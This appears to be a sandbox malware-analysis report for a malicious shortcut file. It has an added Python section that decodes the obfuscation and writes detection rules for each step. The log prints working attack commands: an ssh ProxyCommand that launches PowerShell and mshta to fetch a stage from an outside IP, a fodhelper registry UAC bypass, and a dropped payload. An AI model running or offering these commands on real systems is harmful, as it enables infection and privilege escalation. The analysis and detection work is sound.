          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
          Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown | HTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.7:49719 version: TLS 1.2

          E-Banking Fraud

Source: Yara match | File source: 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: mama.exe PID: 1532, type: MEMORYSTR

          System Summary

Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\mama.exe
Source: A4FY1OA97K.lnk | LNK file: -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" .
Source: C:\Users\user\AppData\Roaming\mama.exe | Code function: 46_2_03525340 LoadLibraryA, GetProcAddress, NtQueryVirtualMemory, NtQueryVirtualMemory
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFAACA22785
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAAB3F0E45
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAAB4C0FB6
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\mama.exe 8E6AE3B356D2205296FEC0761DAA461A311190E50E0E611699EBB4AAD6E6CD77
Source: mama.exe.16.dr | Static PE information: Number of sections : 11 > 10
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
Source: C:\Windows\System32\mshta.exe | Process created: Commandline size = 4181
Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.evad.winLNK@79/70@3/5
Source: C:\Windows\System32\OpenSSH\ssh.exe | File created: C:\Users\user\.ssh
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-508009730
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qj12fnnf.lxl.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
Source: C:\Users\user\AppData\Roaming\mama.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\mama.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\mama.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\mama.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\OpenSSH\ssh.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: A4FY1OA97K.lnk | Virustotal: Detection: 41%
Source: A4FY1OA97K.lnk | ReversingLabs: Detection: 34%
Source: unknown | Process created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" .
Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf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
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nop
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1640,i,18218259324661631593,8502747299906731977,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mama.exe C:\Users\user\AppData\Roaming\mama.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
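The process tree above is the whole infection chain in one place: the LNK launches ssh.exe only for its -o ProxyCommand option, the ProxyCommand is a PowerShell string literal sliced with .SubString(15, 35) so that "mshta" never appears in the LNK, mshta pulls the next stage and hands it to a PowerShell hex-split decoder (its payload is truncated in the report), and that stage writes HKCU\Software\Classes\MS-Settings\CurVer so that the auto-elevating fodhelper.exe runs %TMP%\r.bat, which drops mama.exe (DanaBot) and its WMI disk-serial check. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it re-implements the two visible obfuscation transforms so the command lines can be resolved offline, and runs a handful of detection rules over constructed process-creation events (the ProcEvent type, PIDs and rule names are this example's own; command lines are taken or abridged from the report).

```python
"""Added example (not from the report): resolve the two PowerShell obfuscation stages in the
process tree above and flag the ssh.exe -> PowerShell -> mshta -> fodhelper -> payload chain."""
import re
from dataclasses import dataclass


def substring_stage(literal: str, start: int, length: int) -> str:
    """.NET String.SubString(start, length): 0-based start, exact length, out of range is an error."""
    if start < 0 or length < 0 or start + length > len(literal):
        raise ValueError("SubString arguments out of range")
    return literal[start:start + length]


# Matches  '<literal>'.SubString(a, b)  as embedded in the ssh.exe ProxyCommand string.
SUBSTRING_RE = re.compile(r"'((?:[^']|'')*)'\.SubString\((\d+),\s*(\d+)\)", re.I)


def resolve_substring_calls(cmdline: str) -> list:
    """Return the plaintext that each SubString() call in a command line evaluates to."""
    return [substring_stage(m.group(1).replace("''", "'"), int(m.group(2)), int(m.group(3)))
            for m in SUBSTRING_RE.finditer(cmdline)]


def hex_split_stage(hex_blob: str) -> bytes:
    """Same transform as  function KYLfE($s){ return -split ($s -replace '..', '0x$& ') }:
    every two characters become a '0xHH ' token, -split breaks on whitespace, and the caller
    (truncated in the report) casts the tokens to bytes. Odd-length or non-hex input is
    rejected here rather than imitating PowerShell's lenient cast."""
    tokens = re.sub(r"..", lambda m: "0x" + m.group(0) + " ", hex_blob).split()
    if any(not re.fullmatch(r"0x[0-9a-fA-F]{2}", t) for t in tokens):
        raise ValueError("not an even-length hex string")
    return bytes(int(t, 16) for t in tokens)


@dataclass(frozen=True)
class ProcEvent:  # minimal process-creation record (this example's own type, not a Sysmon schema)
    pid: int
    ppid: int
    image: str
    cmdline: str


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# fodhelper.exe auto-elevates and opens an ms-settings: URI; the handler lookup consults
# HKCU\Software\Classes\ms-settings first, so a CurVer (or Shell\Open\Command) value written
# there by a medium-integrity process redirects the elevated launch to an attacker-chosen ProgID.
MS_SETTINGS_HIJACK = re.compile(
    r"HK(?:EY_CURRENT_USER|CU)\\Software\\Classes\\ms-settings\\(?:CurVer|Shell\\Open\\Command)", re.I)
PROXYCOMMAND_RE = re.compile(r"-o\s+ProxyCommand=", re.I)
WMIC_SERIAL_RE = re.compile(r"\bdiskdrive\b.*\bSerialNumber\b", re.I)


def detect(events) -> list:
    """Return (rule_name, pid) pairs for the suspicious steps of the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = _base(e.image)
        parent = by_pid.get(e.ppid)
        pimg = _base(parent.image) if parent else ""
        if img == "ssh.exe" and PROXYCOMMAND_RE.search(e.cmdline):
            findings.append(("ssh_proxycommand_lolbin", e.pid))
        if pimg == "mshta.exe" and img == "powershell.exe":
            findings.append(("mshta_spawns_powershell", e.pid))
        if img == "reg.exe" and " add " in f" {e.cmdline.lower()} " and MS_SETTINGS_HIJACK.search(e.cmdline):
            findings.append(("ms_settings_handler_hijack", e.pid))
        if pimg == "fodhelper.exe":  # fodhelper.exe has no legitimate reason to spawn children
            findings.append(("fodhelper_uac_bypass_child", e.pid))
        if img == "wmic.exe" and WMIC_SERIAL_RE.search(e.cmdline):
            findings.append(("wmic_disk_serial_vm_check", e.pid))
    return findings


# Constructed events: PIDs are invented, command lines are taken or abridged from the report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
REG = r"C:\Windows\System32\reg.exe"
SSH_CMDLINE = r'''"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" .'''
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\System32\OpenSSH\ssh.exe", SSH_CMDLINE),
    ProcEvent(1001, 1000, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4"'),
    ProcEvent(1002, 1001, r"C:\Windows\System32\mshta.exe", r'"C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4'),
    ProcEvent(1003, 1002, PS, r"powershell.exe -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')}"),
    ProcEvent(1004, 1003, CMD, r'"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"'),
    ProcEvent(1005, 1004, REG, r'REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F'),
    ProcEvent(1006, 1004, REG, r'REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F'),
    ProcEvent(1007, 1004, r"C:\Windows\System32\fodhelper.exe", "FoDHelper.exe"),
    ProcEvent(1008, 1007, CMD, r'C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "'),
    ProcEvent(1009, 1008, r"C:\Users\user\AppData\Roaming\mama.exe", r"C:\Users\user\AppData\Roaming\mama.exe"),
    ProcEvent(1010, 1009, r"C:\Windows\SysWOW64\wbem\WMIC.exe", r'''wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value'''),
    ProcEvent(2000, 1, REG, r"REG QUERY HKCU\Software\Classes\ms-settings\CurVer"),  # benign read; must not fire
]

if __name__ == "__main__":
    print(resolve_substring_calls(SSH_CMDLINE))  # ['mshta https://150.241.97.10/aaa.mp4']
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:28} pid={pid}")
```

The ssh.exe rule is deliberately narrow (ProxyCommand only), because the same host may use OpenSSH legitimately; the fodhelper.exe parent rule and the reg.exe write to HKCU\...\ms-settings are the two observations that survive any re-obfuscation of the earlier stages, and the REG DELETE lines that follow in the tree show why the registry check has to be evaluated on the live event stream rather than on a later registry snapshot.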
Source: C:\Windows\System32\OpenSSH\ssh.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf…
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
Source: C:\Windows\System32\fodhelper.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nop
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1640,i,18218259324661631593,8502747299906731977,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
